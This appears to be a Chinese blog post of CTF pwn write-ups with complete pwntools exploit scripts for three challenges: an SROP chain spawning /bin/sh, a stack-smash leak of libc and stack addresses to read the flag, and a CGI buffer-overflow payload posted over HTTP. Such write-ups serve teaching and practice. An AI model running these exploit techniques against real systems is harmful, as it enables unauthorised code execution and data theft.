本文最后更新于:2023年12月8日 下午
0x0:写在所有之前
别问,问就是👴忘记找研院的联系老师审核了,报名没报上,捏麻麻滴。一想到进决赛就能回浙江耍,我身上仿佛有蚂蚁在爬
🤡🤡🤡🤡🤡🤡🤡🤡🤡🤡🤡
0x1:pwn题解
master of asm
什么👴敢叫自己master of asm啊,知不知道自己有几斤小马珍珠啊
就简单的srop
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'
flag = 0
if flag:
p = remote('182.92.164.148', 48649)
else:
p = process("./a.out")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
xor_0 = 0x40103d
rax_2 = 0x401030
xor_1 = 0x401034
syscall = 0x40102d
bin_sh = 0x40200a
exec_fun = SigreturnFrame()
exec_fun.rax = 0x3b
exec_fun.rdi = bin_sh
exec_fun.rsi = 0
exec_fun.rdx = 0
exec_fun.rip = syscall
shellcode = p64(xor_0)\
+ p64(xor_1)\
+ p64(rax_2)\
+ p64(xor_1)\
+ p64(rax_2)\
+ p64(xor_1)\
+ p64(rax_2)\
+ p64(xor_1)\
+ p64(syscall)\
+ bytes(exec_fun)
p.send(shellcode.ljust(0x190,b'\x00'))
p.interactive()
|
ez_ssp
👴当初铸币了,👴知道是stack smash,但👴不知道为什么一直在想一次溢出就把flag泄露出来,爆破栈地址爆了好久都没成功。
然后结果只要轻轻泄露got表地址,再用libc把_environ里的栈地址拿出来就好了,草
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
| from pwn import *
import sys
context.log_level='debug'
context.arch='amd64'
libc = ELF('./libc-2.23.so')
flag = 0
if flag:
p = remote('182.92.164.148', 48649)
else:
p = process("./ssp")
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
# gdb.attach(p,'b __stack_chk_fail\nc\n')
randon = []
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'a'*0x128 + p64(0x602018))
ru(b'***: ')
libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['puts']
leak("libc.address",libc.address)
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'a'*0x128 + p64(libc.sym['_environ']))
ru(b'***: ')
stack = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
leak("stack",stack)
flag_addr = stack - 0x178
sla(b'?\n',b'a')
ru(b': ')
randon.append(int(rc(2),10))
sla(b'?\n',b'b'*0x128 + p64(flag_addr))
ru(b': ')
flag = rc(50)
print(randon)
flag_list = list(flag) # 将字符串转换为列表,以便进行修改
print(flag_list)
for i in range(len(randon)):
for j in range(len(flag_list)):
flag_list[j] = flag_list[j] ^ randon[2-i]
flag_txt = ''
for i in range(len(flag_list)):
flag_txt = flag_txt + chr(flag_list[i])
print(flag_txt)
p.interactive()
|
APACHE-CGI-PWN
👴一直以为这是个很吊的web pwn,然后浩哥哥直接秒了,👴才发现是个小瘪三
话说最近怎么这么喜欢出套着web皮的 cgi pwn题吗,陇剑也是
这边直接偷浩哥哥的exp了,嘻嘻
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| from pwn import *
import requests
context(log_level='debug')
headers = {
'Cookie': "ROOT-GOD=Every king's blood will end with a sword",
'CONTENT_LENGTH':'99999'
}
payload='a'*(0xe8)+p64(0x4032fc)+p64(0x4032E0)
cookie = requests.post('http://ip:port/getcookie.cgi',data="eeknight",headers=headers)
check = requests.post('http://ip:port/check-ok.cgi', data = payload,headers=headers)
p = requests.get('http://ip:port/flag')
print(cookie.text)
print(check.text)
print(p.text)
|
0x3:最后的最后
有什么好说的呢,就这样吧